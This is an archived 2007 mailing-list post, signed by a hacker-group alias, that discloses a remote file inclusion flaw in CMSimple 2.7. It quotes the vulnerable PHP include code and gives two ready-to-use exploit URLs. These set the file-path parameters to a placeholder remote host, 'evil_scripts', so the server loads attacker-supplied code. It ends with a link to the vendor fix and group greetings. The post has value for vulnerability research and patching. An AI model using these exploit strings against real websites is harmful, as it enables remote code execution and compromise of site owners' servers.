|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
cmsimple 2.7 Remote File Include
From: mr alkomandoz (k3g
hackermail.com)
Date: Sat Jan 20 2007 - 15:29:07 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
-----------------------------------------------
cmsimple 2.7 Remote File Include
-----------------------------------------------
Author: Alk()mand()z
-----------------------------------------------
Vuln Code:
if (! include ($pth['file']['plugin_index']))
{if(include($pth['file']['image']))exit;}
-----------------------------------------------
3xplo!t:
cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://evil_scripts?
cmscmsimple2_7/cmsimple/cms.php?pth['file']['image']=http://evil_scripts?
-----------------------------------------------
download: http://www.cmsimple.dk/?download=cmsimple2_7_fix1.zip
-----------------------------------------------
Greetz: KaBaRa, SpY0zErO, aG-SpIdEr - TOoOoFa
SpeciaL GreeTz : AsB-MaY-GrOuPs & A-S-T -Team
##################################
AsB-MaY.NeT & MoHaNdKo.CoM
##################################
--
_______________________________________________
Get your free email from http://www.hackermail.com
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]